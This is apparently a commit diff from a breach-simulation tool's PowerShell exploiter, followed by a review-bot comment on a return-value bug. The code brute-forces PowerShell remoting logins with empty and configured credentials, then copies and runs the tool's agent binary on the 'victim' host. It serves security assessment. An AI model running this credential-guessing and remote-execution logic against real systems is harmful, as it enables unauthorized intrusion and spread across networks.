Agent: Refactored PowerShellExploiter authentication function names

Mike Salvatore 2021-08-24 09:29:02 -04:00
parent e339932fde
commit f1c247ad93
1 changed files with 52 additions and 47 deletions


@ -41,76 +41,61 @@ class PowerShellExploiter(HostExploiter):
logging.getLogger(package.__name__).setLevel(logging.ERROR) logging.getLogger(package.__name__).setLevel(logging.ERROR)
def _exploit_host(self): def _exploit_host(self):
result = self._attempt_exploitations() self.client = self._authenticate_via_brute_force()
if not result: if not self.client:
return False return False
arch = self._get_host_arch() self._execute_monkey_agent_on_victim()
self.is_32bit = arch == WIN_ARCH_32
self._write_virtual_file_to_local_path() def _authenticate_via_brute_force(self) -> typing.Optional[Client]:
self.monkey_path_on_victim = (
self._config.dropper_target_path_win_32
if self.is_32bit
else self._config.dropper_target_path_win_64
)
is_monkey_copy_successful = self._copy_monkey_binary_on_victim()
if is_monkey_copy_successful:
self._execute_monkey_on_victim()
else:
return False
return True
def _attempt_exploitations(self) -> bool:
try: try:
self.client = self._exploit_without_credentials() client = self._authenticate_with_empty_credentials()
return client
except FailedExploitationError: except FailedExploitationError:
LOG.info("Failed exploitation without credentials.") LOG.info("Failed exploitation without credentials.")
try:
self.client = self._exploit_with_usernames_only(
usernames=self._config.exploit_user_list
)
except FailedExploitationError:
LOG.info("Failed exploitation using configured usernames only.")
try:
self.client = self._exploit_with_credentials(
credential_list=self._config.get_exploit_user_password_pairs()
)
except FailedExploitationError:
LOG.info("Failed exploitation using configured credentials. Quitting.")
return False
return True try:
client = self._authenticate_with_empty_passwords(
usernames=self._config.exploit_user_list
)
return client
except FailedExploitationError:
LOG.info("Failed exploitation using configured usernames only.")
def _exploit_without_credentials(self) -> Client: try:
return self._try_exploit() client = self._authenticate_with_usernames_and_passwords(
credential_list=self._config.get_exploit_user_password_pairs()
)
return client
except FailedExploitationError:
LOG.info("Failed exploitation using configured credentials. Quitting.")
def _exploit_with_usernames_only(self, usernames: typing.List[str]) -> Client: return None
def _authenticate_with_empty_credentials(self) -> Client:
return self._authenticate(None, None)
def _authenticate_with_empty_passwords(self, usernames: typing.List[str]) -> Client:
for username in usernames: for username in usernames:
try: try:
client = self._try_exploit(username) client = self._authenticate(username, None)
return client return client
except FailedExploitationError: except FailedExploitationError:
pass pass
raise FailedExploitationError raise FailedExploitationError
def _exploit_with_credentials( def _authenticate_with_usernames_and_passwords(
self, credential_list: typing.List[typing.Tuple[str, str]] self, credential_list: typing.List[typing.Tuple[str, str]]
) -> Client: ) -> Client:
for username, password in credential_list: for username, password in credential_list:
try: try:
client = self._try_exploit(username, password) client = self._authenticate(username, password)
return client return client
except FailedExploitationError: except FailedExploitationError:
pass pass
raise FailedExploitationError raise FailedExploitationError
def _try_exploit( def _authenticate(self, username: str, password: str) -> Client:
self, username: typing.Optional[str] = None, password: typing.Optional[str] = None
) -> Client:
try: try:
with Client( with Client(
self.host.ip_addr, self.host.ip_addr,
@ -124,6 +109,26 @@ class PowerShellExploiter(HostExploiter):
except Exception: except Exception:
raise FailedExploitationError raise FailedExploitationError
def _execute_monkey_agent_on_victim(self):
arch = self._get_host_arch()
self.is_32bit = arch == WIN_ARCH_32
self._write_virtual_file_to_local_path()
self.monkey_path_on_victim = (
self._config.dropper_target_path_win_32
if self.is_32bit
else self._config.dropper_target_path_win_64
)
is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
if is_monkey_copy_successful:
self._run_monkey_executable_on_victim()
else:
return False
return True
def _get_host_arch(self) -> typing.Union[WIN_ARCH_32, WIN_ARCH_64]: def _get_host_arch(self) -> typing.Union[WIN_ARCH_32, WIN_ARCH_64]:
output = self._execute_cmd_on_host(GET_ARCH_WINDOWS) output = self._execute_cmd_on_host(GET_ARCH_WINDOWS)
if "64-bit" in output: if "64-bit" in output:
@ -142,7 +147,7 @@ class PowerShellExploiter(HostExploiter):
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file: with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
monkey_local_file.write(monkey_virtual_file.read()) monkey_local_file.write(monkey_virtual_file.read())
def _copy_monkey_binary_on_victim(self) -> bool: def _copy_monkey_binary_to_victim(self) -> bool:
try: try:
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim) self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
return True return True
@ -151,7 +156,7 @@ class PowerShellExploiter(HostExploiter):
finally: finally:
os.remove(TEMP_MONKEY_BINARY_FILEPATH) os.remove(TEMP_MONKEY_BINARY_FILEPATH)
def _execute_monkey_on_victim(self) -> None: def _run_monkey_executable_on_victim(self) -> None:
monkey_params = build_monkey_commandline( monkey_params = build_monkey_commandline(
target_host=self.host, target_host=self.host,
depth=get_monkey_depth() - 1, depth=get_monkey_depth() - 1,
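Review bot: In the new `_exploit_host`, the result of `self._execute_monkey_agent_on_victim()` is discarded, so as far as the rendered lines show the method falls through and returns None on the success path, where the old body ended in `return True`. A caller that treats the return value as the exploitation outcome would then record the host as not exploited even though the agent was copied and started, so the assessment report would understate exposure; the call should read `return self._execute_monkey_agent_on_victim()`. Separately, `_authenticate(self, username: str, password: str)` receives `None` for both arguments from `_authenticate_with_empty_credentials` and a `None` password from `_authenticate_with_empty_passwords`, so the annotations should stay `typing.Optional[str]` as they were on `_try_exploit`. The +/- markers are lost in this side-by-side rendering, so the first point should be confirmed against the raw diff.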